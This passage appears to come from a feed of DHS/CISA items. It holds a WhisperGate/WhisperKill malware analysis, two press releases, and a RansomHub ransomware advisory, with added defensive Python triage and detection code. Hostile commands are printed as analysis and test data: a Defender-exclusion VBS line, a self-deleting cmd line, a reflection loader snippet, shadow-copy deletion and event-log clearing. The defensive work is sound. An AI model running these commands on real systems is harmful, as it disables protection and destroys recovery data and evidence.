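        raise ValueError("blob does not end with 'ZM'; not a reversed PE")
    pe = blob[::-1]
    if not looks_like_pe(pe):
        raise ValueError("restored bytes carry no valid MZ/PE header")
    return pe


def decode_utf16le_b64(text: str) -> str:
    """Decode a base64 string whose payload is UTF-16LE text."""
    return base64.b64decode(text).decode("utf-16-le")


def build_sample_reversed_pe() -> bytes:
    """Constructed minimal MZ/PE header (not a real binary), stored reversed."""
    header = bytearray(0x44)
    header[:2] = MZ_MAGIC
    struct.pack_into("<I", header, 0x3C, 0x40)   # e_lfanew -> offset 0x40
    header[0x40:0x44] = PE_SIGNATURE
    return bytes(header)[::-1]


if __name__ == "__main__":
    sample = build_sample_reversed_pe()
    print("reversed PE:", is_reversed_pe(sample))
    print("restored header ok:", looks_like_pe(restore_reversed_pe(sample)))
    # String from the advisory; decodes to "Start-Sleep -s 10"
    print(decode_utf16le_b64("UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA=="))
```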

Table 20: Tbopbh.jpg Properties
MD5 e61518ae9454a563b8f842286bbdb87b
SHA-256 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d
Protector Eazfuscator(-)[-]
Library .NET(v4.0.30319)[-]
Linker Microsoft Linker(6.0)[DLL32]
TimeDateStamp 2022-01-10 09:39:31

The original filename from the resulting payload was a Dynamic Link Library (DLL) file, Frkmlkdkdubkznbkmcf.dll; its attributes are listed in Table 21:

Table 21: Frkmlkdkdubkznbkmcf.dll Attributes
Resources: u2005 u2005 u2009 u2008 u2001 u2007 u2009 u200b u200a u2005; 7c8cb5598e724d34384cce7402b11f0e; 78c855a088924e92a7f60d661c3d1845
Classes: Main – ClassLibrary1; u0002
Methods: pc1eOx2WJVV1579235895 – Ylfwdwgmpilzyaph

Note: The escaped names (u2005, u200b, u0002, and so on) are Unicode whitespace, zero-width, and control characters that EazFuscator uses as identifiers, making the items difficult for malware analysts to review.

stage2.exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource 78c855a088924e92a7f60d661c3d1845. The reflection library was used to execute method Ylfwdwgmpilzyaph, as shown in the following C# code block:

using System;
using System.IO;
using System.Reflection;
// Resolve the restored DLL on disk and load it as an assembly.
string path = "Frkmlkdkdubkznbkmcf.dll";
string fqpn = Path.GetFullPath(path);
Assembly assembly = Assembly.LoadFile(fqpn);
// Locate the obfuscated entry class and invoke its method by name.
Type type = assembly.GetType("ClassLibrary1.Main");
type.InvokeMember("Ylfwdwgmpilzyaph", BindingFlags.InvokeMethod, null, null, null);

The following application configuration accompanied the above code block to allow loading from remote sources:

Upon invocation of the method Ylfwdwgmpilzyaph, Nmddfrqqrbyjeygggda.vbs was written to the Windows %TEMP% directory; its attributes are listed in Table 22 below.

Table 22: Nmddfrqqrbyjeygggda.vbs Attributes
MD5 6eed4ee0cc57126e9a096ab9905f471c
SHA-256 db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f
VBS Code CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:'", 0, False

The VBS code listed in Table 22 used a WScript.Shell object to run a PowerShell command in a hidden window (window style 0, without waiting for it to return) that excluded the C: drive from Windows Defender's security checks. Malware analysts decoded and decrypted one of the resources from Frkmlkdkdubkznbkmcf.dll (78c855a088924e92a7f60d661c3d1845). Further analysis of Frkmlkdkdubkznbkmcf.dll yielded an additional DLL file with the following hashes:

  • MD5: 5a537673c34933fc854fbfb65477a686
  • SHA-256: 35feefe6bd2b982cb1a5d4c1d094e8665c51752d0a6f7e3cae546d770c280f3a

This decrypted DLL file contained two resources, AdvancedRun and Waqybg.

  • AdvancedRun (GZIP)
    • MD5: de85ca91e1e8100a619de1c25112f1a5
    • SHA-256: 489ab4819830d231c3fc3572c5386cad9d18773a8121373ea8174de981cc9166
  • Waqybg (GZIP)
    • Reversed byte order:
      • MD5: 9b1191f1ceddf312b0d609cd929c6631
      • SHA-256: 0dd61a16c625c49ffefaf4ce24cabf9a074028a06640d9bbb804f735ff56dfa3
    • Original byte order:
      • MD5: 29d83f29c0b0a0b7499e71e7d5cb713f
      • SHA-256: fd4a5398e55beacb2315687a75af5aa15b776b5d36b9800a1792ede3955616c2

Table 23 and Table 24 list the file properties for both the AdvancedRun and reversed Waqybg decompressed files.

Table 23: AdvancedRun (decompressed)
Type Win32 EXE
Company NirSoft
TimeStamp 2020:08:03 09:41:38-04:00
Original File Name AdvancedRun.exe
MD5 17fc12902f4769af3a9271eb4e2dacce
SHA-256 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
Table 24: Waqybg (reversed; decompressed)
Type Win32 EXE
TimeStamp 2022:01:10 03:14:38-05:00
MD5 3907c7fbd4148395284d8e6e3c1dba5d
SHA-256 34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907
Compiler MinGW(GCC: (GNU) 6.3.0)[-]
Linker GNU linker Id (GNU Binutils)(2.28)[Console32,console]

The reversed and decompressed Waqybg file contained file corruption logic along with a final command that pings an arbitrary address as a delay and then deletes the file itself: cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q "%s". Waqybg is known as WhisperKill, a malware downloaded by WhisperGate that destroys files with specific extensions.[19],[21]

The file extensions listed in Table 25 were targeted for corruption using logic equivalent to the C wcscmp function (an exact wide-string comparison). The corruption logic overwrote 0x100000 bytes (1 MB) of each targeted file with the value 0xCC.

Table 25: File Extensions Targeted by WhisperKill
u".3DM" u".3DS" u".602" u".ACCDB" u".ARC" u".ASC"
u".ASM" u".ASP" u".ASPX" u".BACKUP" u".BAK" u".BAT"
u".BMP" u".BRD" u".BZ2" u".CGM" u".CLASS" u".CMD"
u".CONFIG" u".CPP" u".CRT" u".CSR" u".CSV" u".DBF"
u".DCH" u".DER" u".DIF" u".DIP" u".DJVU.SH" u".DOC"
u".DOCB" u".DOCM" u".DOCM" u".DOCX" u".DOT" u".DOTM"
u".DOTX" u".DWG" u".EDB" u".EML" u".FRM" u".GIF"
u".HDD" u".HTM" u".HWP" u".IBD" u".INC" u".INI"
u".ISO" u".JAR" u".JAVA" u".JPEG" u".JPG" u".JSP"
u".KDBX" u".KEY" u".LAY" u".LAY6" u".LDF" u".LOG"
u".MAX" u".MDB" u".MDF" u".MML" u".MSG" u".MYD"
u".MYI" u".NEF" u".NVRAM" u".ODB" u".ODG" u".ODP"
u".ODS" u".ODT" u".OGG" u".ONETOC2" u".OST" u".OTG"
u".OTP" u".OTS" u".OTT" u".P12" u".PAQ" u".PAS"
u".PDF" u".PEM" u".PFX" u".PHP" u".PHP3" u".PHP4"
u".PHP5" u".PHP6" u".PHP7" u".PHPS" u".PHTML" u".PNG"
u".POT" u".POTM" u".POTX" u".PPAM" u".PPK" u".PPS"
u".PPSM" u".PPSX" u".PPT" u".PPTM" u".PPTM" u".PPTX"
u".PS1" u".PSD" u".PST" u".RAR" u".RAW" u".RTF"
u".SAV" u".SCH" u".SHTML" u".SLDM" u".SLDX" u".SLK"
u".SLN" u".SNT" u".SQ3" u".SQL" u".SQLITE3" u".SQLITEDB"
u".STC" u".STD" u".STI" u".STW" u".SUO" u".SVG"
u".SXC" u".SXD" u".SXI" u".SXM" u".SXW" u".TAR"
u".TBK" u".TGZ" u".TIF" u".TIFF" u".TXT" u".UOP"
u".UOT" u".VBS" u".VCD" u".VDI" u".VHD" u".VMDK"
u".VMEM" u".VMSD" u".VMSN" u".VMSS" u".VMTM" u".VMTX"
u".VMX" u".VMXF" u".VSD" u".VSDX" u".VSWP" u".WAR"
u".WB2" u".WK1" u".WKS" u".XHTML" u".XLC" u".XLM"
u".XLS" u".XLSB" u".XLSM" u".XLSM" u".XLSX" u".XLT"
u".XLTM" u".XLTX" u".XLW" u".YML" u".ZIP"
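The targeting and overwrite behavior described above (Table 25, wcscmp matching, 0x100000 bytes of 0xCC per file), as an added Python triage example that is not CISA's code: it flags files whose extension is on the list and checks whether their first 1 MB already shows the 0xCC pattern. The extension subset and the sample files are constructed for the demonstration; whether the binary normalizes case before comparing is not stated in the advisory, so the match here is exact, as wcscmp is.

```python
"""WhisperKill corruption triage (added example, not CISA's code)."""
import os
import tempfile

CORRUPT_LEN = 0x100000      # 1 MB overwritten per targeted file
CORRUPT_BYTE = 0xCC
# Subset of Table 25; stored in the binary as uppercase wide-string literals.
TARGETED_EXTENSIONS = frozenset({
    ".DOCX", ".XLSX", ".PDF", ".SQL", ".VMDK", ".KDBX", ".PEM", ".PFX",
    ".BAK", ".BACKUP", ".LOG", ".TXT", ".ZIP",
})


def extension_is_targeted(path: str) -> bool:
    """wcscmp-style match: exact, case-sensitive comparison of the extension."""
    _, ext = os.path.splitext(path)
    return ext in TARGETED_EXTENSIONS


def corruption_ratio(path: str) -> float:
    """Fraction of the first CORRUPT_LEN bytes (or the whole file, if
    shorter) equal to 0xCC; a value near 1.0 indicates WhisperKill damage."""
    with open(path, "rb") as fh:
        head = fh.read(CORRUPT_LEN)
    if not head:
        return 0.0
    return head.count(CORRUPT_BYTE) / len(head)


def looks_corrupted(path: str, threshold: float = 0.99) -> bool:
    return corruption_ratio(path) >= threshold


def scan_tree(root: str):
    """Yield (path, targeted, corrupted) for every file under root."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            targeted = extension_is_targeted(p)
            yield p, targeted, (targeted and looks_corrupted(p))


def scan_summary(root: str) -> dict:
    """{basename: (targeted, corrupted)} for a quick incident-response view."""
    return {os.path.basename(p): (t, c) for p, t, c in scan_tree(root)}


def build_sample_tree() -> str:
    """Constructed test tree: one intact targeted file, one 'corrupted'
    targeted file, and one lowercase extension that wcscmp would not match."""
    root = tempfile.mkdtemp(prefix="whisperkill_demo_")
    with open(os.path.join(root, "report.DOCX"), "wb") as fh:
        fh.write(b"PK\x03\x04" + b"A" * 4096)                   # intact
    with open(os.path.join(root, "db.SQL"), "wb") as fh:
        fh.write(bytes([CORRUPT_BYTE]) * CORRUPT_LEN + b"tail")  # damaged
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"hello")                                      # not matched
    return root


if __name__ == "__main__":
    for name, (targeted, corrupted) in scan_summary(build_sample_tree()).items():
        print(f"{name}: targeted={targeted} corrupted={corrupted}")
```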

Malware Related to Tbopbh.jpg

stage2.exe and its respective payload, Tbopbh.jpg, served as a template for other malware within Discord Cluster 1. While most of these other malware files have not been observed in open source reporting, malware analysts assess them as payloads that follow the unraveling process shown in Figure 1 below.

Figure 1: stage2.exe Execution Process Template

Table 26 below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become DLL files, which were structured similarly to Frkmlkdkdubkznbkmcf.dll.

Note: Analysts identified the files below in Discord Cluster 1; the files are staged on the Cluster in reversed byte order. Analysts reversed the byte order of each file into its proper portable executable format, i.e., the "Functional" format. The hashes in Table 26 represent both byte orders.


Appendix B: Indicators of Compromise

Table 27 lists IP addresses first observed as early as 2022 that have been historically linked to Unit 29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activity.


Threat actors can exploit jump hosts, also known as jump servers or bastion hosts, to gain unauthorized access or perform malicious activities within a protected network. In this context, the domains listed in Table 28 represent the tools used to establish functionality for creating a jump host.

DHS Partners with Japanese Counterparts to Strengthen Maritime Cybersecurity Cooperation

Source: US Department of Homeland Security

WASHINGTON – From August 21-22, the U.S. Department of Homeland Security (DHS) and the Government of Japan conducted a successful tabletop exercise focused on enhancing maritime cybersecurity and incident response capabilities. This reflects the continued commitment by the United States and Japan to cybersecurity collaboration, including on domestic cyber policies such as those related to the protection of maritime critical infrastructure. The exercise simulated a major cyber incident impacting operations at a Japanese port, testing incident response policies and procedures and fostering conversations between the United States and Japan on how to enhance mutual preparedness for threats to interconnected critical infrastructure.

The collaboration builds upon Secretary Mayorkas’s priority to enhance close cooperation with partners in the Indo-Pacific region. U.S. and Japanese participants discussed protocols for incident response, information sharing, and future bilateral cooperation to more effectively mitigate current and emerging cyber threats to critical maritime infrastructure. The exercise also allowed DHS and the Ministry of Land, Infrastructure, Transport and Tourism to engage on relevant maritime cybersecurity policies, including President Biden’s February 2024 Executive Order on Amending Regulations Relating to the Safeguarding of Vessels, Harbors, Ports, and Waterfront Facilities of the United States.

“Exercises like these bolster our nation’s capabilities and establish reliable channels for coordination with key international partners,” said Under Secretary for Policy Robert Silvers.  “Cyber attacks pose a shared risk, beyond any single nation’s control, making it imperative for the United States and Japan to collaborate in addressing these challenges to thrive in such interconnected environments.”

“Malicious cyber actors recognize ports worldwide possess the same critical vulnerabilities and are increasingly willing to target them,” said Admiral Linda Fagan, Commandant of the U.S. Coast Guard. “Coordinating together to share risk information, improving operational coordination between incident responders, and building our collective capacity to withstand the targeting of port infrastructure is a necessary step to safeguard the global maritime system.”

“Cyber attacks to ports and harbors could potentially disrupt key international logistics functions which serve as a lifeline of Japan, a country surrounded by the sea, affecting both Japan and the United States,” stated Dr. Masahiro Inada, Director General of the Ports and Harbours Bureau, Ministry of Land, Infrastructure, Transport and Tourism. “I intend to share best practices gained through this exercise and continue to promote the reinforcement of cyber security of ports and harbors, while working together with relevant parties.”

“The opportunity to collaborate within the Department and with the Government of Japan was extremely beneficial to building effective partnerships that strengthen maritime systems cybersecurity and resilience,” said CISA’s Executive Assistant Director for Infrastructure Security Dr. David Mussington. “This joint exercise underscores the importance of international planning to ensure we are equipped to respond to cyber threats and reduce risks to global maritime activities.”

This was the second maritime security tabletop exercise that DHS has held this year, following the success of a joint exercise with Indonesian counterparts in June 2024. DHS and Japanese counterparts plan to build off of this exercise by operationalizing lessons learned and each participant will strengthen its cybersecurity measures.

The two days were organized by the Department’s Office of Policy, the Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Coast Guard, with inputs and participation from the Embassy of the United States of America in Tokyo, the Office of Intelligence & Analysis (I&A), and the Supply Chain Resilience Center. On the Japanese side, the Ports and Harbours Bureau of the Ministry of Land, Infrastructure, Transport and Tourism hosted the exercise, with participation from the National Center of Incident Readiness and Strategy for Cybersecurity (NISC), Prefectural Police, Port Authorities, and others, and with the National Security Secretariat, the Japan Coast Guard, the National Police Agency, and additional port stakeholders in observational roles.

CISA Launches New Portal to Improve Cyber Reporting

Source: US Department of Homeland Security

CISA Services Portal and Voluntary Cyber Incident Reporting webpage, with resources and frequently asked questions, is now live

WASHINGTON – Today, the Cybersecurity and Infrastructure Security Agency (CISA) announced that its cyber incident reporting form has moved to the new CISA Services Portal as part of its ongoing effort to improve cyber incident reporting.

The Portal is a secure platform with enhanced functionality for cyber incident reporting, including integration with login.gov credentials. The portal’s enhanced functionality includes the ability to save and update reports, share submitted reports with colleagues or clients for third-party reporting, and search and filter reports. A new collaboration feature allows users to engage in informal discussions with CISA.

“Any organization experiencing a cyber attack or incident should report it – for its own benefit, and to help the broader community. CISA and our government partners have unique resources and tools to aid with response and recovery, but we can’t help if we don’t know about an incident,” said CISA Executive Assistant Director for Cybersecurity Jeff Greene. “Sharing information allows us to work with our full breadth of partners so that the attackers can’t use the same techniques on other victims, and can provide insight into the scale of an adversary’s campaign. CISA is excited to make available our new portal with improved functionality and features for cyber reporting.”

To guide incident reporters through the reporting process, CISA also released a voluntary cyber incident reporting resource. It helps entities understand “who” should report an incident, “why and when” they should report, as well as “what and how to report.” Several resources to reduce cyber risk are also available.

CISA encourages all organizations to take advantage of its new streamlined portal and voluntarily report cyber incidents.

Learn more by visiting the CISA Services Portal and Voluntary Cyber Incident Reporting Resource.

###

About CISA 

As the nation’s cyber defense agency and national coordinator for critical infrastructure security, the Cybersecurity and Infrastructure Security Agency leads the national effort to understand, manage, and reduce risk to the digital and physical infrastructure Americans rely on every hour of every day.

Visit CISA.gov for more information and follow us on Twitter, Facebook, LinkedIn, and Instagram.

#StopRansomware: RansomHub Ransomware

Source: US Department of Homeland Security

Summary

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. These have been identified through FBI threat response activities and third-party reporting as recently as August 2024. RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV).

Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.

The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. It should be noted that data exfiltration methods are dependent on the affiliate conducting the network compromise. The ransom note dropped during encryption does not generally include an initial ransom demand or payment instructions. Instead, the note provides victims with a client ID and instructs them to contact the ransomware group via a unique .onion URL (reachable through the Tor browser). The ransom note typically gives victims between three and 90 days to pay the ransom (depending on the affiliate) before the ransomware group publishes their data on the RansomHub Tor data leak site.

The authoring organizations encourage network defenders to implement the recommendations in the Mitigations section of this cybersecurity advisory to reduce the likelihood and impact of ransomware incidents.

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access

RansomHub affiliates typically compromise internet facing systems and user endpoints by using methods such as phishing emails [T1566], exploitation of known vulnerabilities [T1190], and password spraying [T1110.003]. Password spraying targets accounts compromised through data breaches. Proof-of-concept exploits are obtained from sources such as ExploitDB and GitHub [T1588.005]. Exploits based on the following CVEs have been observed:

  • CVE-2023-3519 (CWE-94)
    • Citrix ADC (NetScaler) Remote Code Execution. A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of the NSPPE (NetScaler Packet Processing Engine) process by making a specially crafted HTTP GET request. Successful exploitation results in remote code execution as root.
  • CVE-2023-27997 (CWE-787 | CWE-122)
    • A heap-based buffer overflow vulnerability in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.
  • CVE-2023-46604 (CWE-502)
    • The Java OpenWire protocol marshaller, such as in Apache ActiveMQ, is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to open either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Upgrading both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 fixes this issue.
  • CVE-2023-22515
    • A vulnerability in publicly accessible Confluence Data Center and Server instances that allows the creation of unauthorized Confluence administrator accounts and access to Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
  • CVE-2023-46747 (CWE-306 | CWE-288)
    • Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
  • CVE-2023-48788 (CWE-89)
    • An improper neutralization of special elements used in an SQL command ('SQL injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2 and FortiClientEMS 7.0.1 through 7.0.10 allows an attacker to execute unauthorized code or commands via specially crafted packets.
  • CVE-2017-0144
    • The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, also known as “Windows SMB Remote Code Execution Vulnerability” [T1210].
  • CVE-2020-1472
    • An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC).
  • CVE-2020-0787
    • This vulnerability was also potentially exploited along with the Zerologon privilege escalation vulnerability.

Discovery

RansomHub affiliates conduct network scanning with tools such as AngryIPScanner and Nmap, and with PowerShell-based living-off-the-land methods [T1018][T1046][T1059.001].

Defense Evasion

Cybersecurity researchers have observed affiliates renaming the ransomware executable with innocuous file names, such as Windows.exe, left on the user’s desktop (C:\Users\%USERNAME%\Desktop) or downloads (C:\Users\%USERNAME%\Downloads) [T1036]. The affiliates have also cleared Windows and Linux system logs to inhibit any potential incident response [T1070]. Affiliates used Windows Management Instrumentation [T1047] to disable antivirus products. In some instances, RansomHub-specific tools were deployed to disable endpoint detection and response (EDR) tooling [T1562.001].

Privilege Escalation and Lateral Movement

Following initial access, RansomHub affiliates created user accounts for persistence [T1136], reenabled disabled accounts [T1098], and used Mimikatz [S0002] on Windows systems to gather credentials [T1003] and escalate privileges to SYSTEM [T1068]. Affiliates then moved laterally inside the network through methods including Remote Desktop Protocol (RDP) [T1021.001], PsExec [S0029], Anydesk [T1219], Connectwise, N-Able, Cobalt Strike [S0154], Metasploit, or other widely used command-and-control (C2) methods.

Data Exfiltration

Data exfiltration methods depend heavily on the affiliate conducting the network compromise. The ransomware binary does not normally include any mechanism for data exfiltration. Data exfiltration has been observed through the usage of tools such as PuTTY [T1048.002], Amazon AWS S3 buckets/tools [T1537], HTTP POST requests [T1048.003], WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.

Encryption

RansomHub ransomware has typically leveraged an elliptic-curve encryption scheme based on Curve25519 to encrypt user-accessible files on the system [T1486]. Curve25519 uses a public/private key pair that is unique to each victim organization. To successfully encrypt files that are currently in use, the ransomware binary will typically attempt to stop the following processes:

  • “vmms.exe”
  • “msaccess.exe”
  • “mspub.exe”
  • “svchost.exe”
  • “vmcompute.exe”
  • “notepad.exe”
  • “ocautoupds.exe”
  • “ocomm.exe”
  • “ocssd.exe”
  • “oracle.exe”
  • “onenote.exe”
  • “outlook.exe”
  • “powerpnt.exe”
  • “explorer.exe”
  • “sql.exe”
  • “steam.exe”
  • “synctime.exe”
  • “vmwp.exe”
  • “thebat.exe”
  • “thunderbird.exe”
  • “visio.exe”
  • “winword.exe”
  • “wordpad.exe”
  • “xfssvccon.exe”
  • “TeamViewer.exe”
  • “agntsvc.exe”
  • “dbsnmp.exe”
  • “dbeng50.exe”
  • “encsvc.exe”

The ransomware binary will attempt to encrypt any files that the user has access to, including user files and networked shares.

RansomHub implements intermittent encryption, encrypting files in 0x100000 byte chunks and skipping every 0x200000 bytes of data in between encrypted chunks. Files smaller than 0x100000 bytes in size are completely encrypted. Files are appended with 58 (0x3A) bytes of data at the end. This data contains a value which is likely part of an encryption/decryption key. The structure of the appended 0x3A bytes is listed below with images from three different encrypted files.

Figure 1: The first eight bytes are the size of the encrypted file.

The next eight bytes are the size of encrypted blocks. If the entire file is encrypted, this section is all zeros. In this example, each encrypted section is 0x100000 bytes long, with 0x100000 bytes between each encrypted block. This number was observed changing based on the size of the encrypted file.

Figure 2: The size of encrypted blocks.

The next two bytes were always seen to be 0x0001.

Figure 3: The next two bytes are always 0x0001.

The next 32 bytes are the public encryption key for the file.

Figure 4: Public encryption key for the file.

The next four bytes are a checksum value.

Figure 5: Checksum value.

The last four bytes are always seen to be the sequence 0x00ABCDEF.

Figure 6: The last four bytes.
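The trailer layout described above (8-byte file size, 8-byte encrypted-block size, 2-byte 0x0001 marker, 32-byte per-file public key, 4-byte checksum, 4-byte 0x00ABCDEF) adds up to exactly 0x3A bytes, which is enough to write a triage parser. The following is an added example, not code from the advisory or from any of the authoring organizations; it also models the chunk/skip layout from the intermittent-encryption paragraph. Two details the advisory does not state are assumptions here: the size fields are treated as little-endian integers, and the marker and final sequence are compared as raw bytes in the order the advisory prints them. The sample file body and trailer are constructed for the example, not taken from a real sample, and the checksum algorithm is not identified by the advisory, so the value is only extracted, not verified.

```python
"""Parse the 0x3A-byte trailer RansomHub appends to encrypted files (added example)."""
import struct
from dataclasses import dataclass
from typing import List, Tuple

TRAILER_LEN = 0x3A                 # 58 bytes, per the advisory
MARKER = b"\x00\x01"               # "always 0x0001" (assumed byte order as printed)
TAIL = b"\x00\xAB\xCD\xEF"         # "always 0x00ABCDEF" (assumed byte order as printed)
CHUNK = 0x100000                   # length of each encrypted chunk
SKIP = 0x200000                    # plaintext gap between encrypted chunks


@dataclass
class Trailer:
    file_size: int       # reported size of the encrypted file
    block_size: int      # 0 when the whole file was encrypted
    marker: bytes
    public_key: bytes    # 32-byte per-file public key
    checksum: int        # extracted only; algorithm not described by the advisory
    tail: bytes


def parse_trailer(data: bytes) -> Trailer:
    """Split the last 58 bytes of an encrypted file into its fields."""
    if len(data) < TRAILER_LEN:
        raise ValueError("input shorter than a 0x3A-byte trailer")
    t = data[-TRAILER_LEN:]
    # Assumption: both size fields are little-endian unsigned 64-bit integers.
    file_size, block_size = struct.unpack("<QQ", t[0:16])
    return Trailer(
        file_size=file_size,
        block_size=block_size,
        marker=t[16:18],
        public_key=t[18:50],
        checksum=struct.unpack("<I", t[50:54])[0],
        tail=t[54:58],
    )


def looks_like_ransomhub(data: bytes) -> bool:
    """Triage check: a trailer is present and both constant fields are intact."""
    try:
        t = parse_trailer(data)
    except ValueError:
        return False
    return t.marker == MARKER and t.tail == TAIL


def encrypted_ranges(plain_size: int, chunk: int = CHUNK, skip: int = SKIP) -> List[Tuple[int, int]]:
    """[start, end) byte ranges the described intermittent scheme would encrypt.

    Files smaller than one chunk are encrypted whole. The advisory notes the block
    size varies with file size, so this models only the layout it describes.
    """
    if plain_size <= 0:
        return []
    if plain_size < chunk:
        return [(0, plain_size)]
    ranges = []
    pos = 0
    while pos < plain_size:
        end = min(pos + chunk, plain_size)
        ranges.append((pos, end))
        pos = end + skip
    return ranges


def constructed_sample() -> bytes:
    """A made-up file body plus trailer for demonstration; not a real sample."""
    body = b"\x00" * 64
    trailer = (struct.pack("<QQ", 0x500000, 0x100000)
               + MARKER
               + bytes(range(32))               # placeholder public key
               + struct.pack("<I", 0xDEADBEEF)  # placeholder checksum
               + TAIL)
    return body + trailer


if __name__ == "__main__":
    sample = constructed_sample()
    print(looks_like_ransomhub(sample))
    print(parse_trailer(sample))
    print(encrypted_ranges(0x500000))
```

Used as a first-pass triage check on a suspected encrypted file, `looks_like_ransomhub` only confirms the two constant fields; a mismatch may simply mean a different build, so treat the result as a hint and confirm with the ransom note and file-extension behaviour described in this section.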

The ransomware executable does not typically encrypt executable files. A random file extension is added to file names and a ransom note generally titled How To Restore Your Files.txt is left on the compromised system. To further inhibit system recovery, the ransomware executable typically leverages the vssadmin.exe program to delete volume shadow copies [T1490].
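The Defense Evasion section above and the vssadmin.exe behaviour just described can each be expressed as a detection rule over process-creation telemetry. The block below is an added example, not code from the advisory; it runs three rules over constructed records in a simplified Sysmon Event ID 1 shape (image path, command line, user). The `wevtutil cl` syntax for clearing an event log is a well-known Windows command, not something the advisory names; the advisory only states that affiliates cleared logs.

```python
"""Detection rules for host behaviours the advisory attributes to RansomHub (added example)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]


@dataclass(frozen=True)
class Hit:
    technique: str
    reason: str
    image: str


# Constructed process-creation records; paths and names mirror those the advisory reports.
EVENTS: List[Event] = [
    {"image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows", "user": r"CORP\svc-backup"},
    {"image": r"C:\Users\alice\Desktop\Windows.exe",
     "cmdline": "Windows.exe", "user": r"CORP\alice"},
    {"image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil.exe cl Security", "user": r"CORP\alice"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt", "user": r"CORP\alice"},
]


def _image_is(ev: Event, name: str) -> bool:
    """Match on the binary name, ignoring case and directory."""
    return ev["image"].lower().endswith("\\" + name)


def shadow_copy_deletion(ev: Event) -> bool:
    # T1490: vssadmin.exe used to delete volume shadow copies.
    cmd = ev["cmdline"].lower()
    return _image_is(ev, "vssadmin.exe") and "delete" in cmd and "shadows" in cmd


def event_log_clearing(ev: Event) -> bool:
    # T1070: wevtutil.exe clearing an event log ("cl" is short for "clear-log").
    return _image_is(ev, "wevtutil.exe") and re.search(r"\b(cl|clear-log)\b", ev["cmdline"], re.I) is not None


# Only user-profile Desktop/Downloads folders, as reported in the advisory.
MASQ_PATH = re.compile(r"^[a-z]:\\users\\[^\\]+\\(desktop|downloads)\\windows\.exe$", re.I)


def masqueraded_binary(ev: Event) -> bool:
    # T1036: a binary named Windows.exe executed from a user's Desktop or Downloads folder.
    return MASQ_PATH.match(ev["image"]) is not None


RULES: List[Tuple[str, str, Callable[[Event], bool]]] = [
    ("T1490", "vssadmin.exe invoked to delete volume shadow copies", shadow_copy_deletion),
    ("T1070", "wevtutil.exe used to clear an event log", event_log_clearing),
    ("T1036", "Windows.exe run from a Desktop or Downloads folder", masqueraded_binary),
]


def scan(events: List[Event]) -> List[Hit]:
    """Apply every rule to every record and return the hits in record order."""
    hits: List[Hit] = []
    for ev in events:
        for technique, reason, predicate in RULES:
            if predicate(ev):
                hits.append(Hit(technique, reason, ev["image"]))
    return hits


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(f"[{hit.technique}] {hit.reason}: {hit.image}")
```

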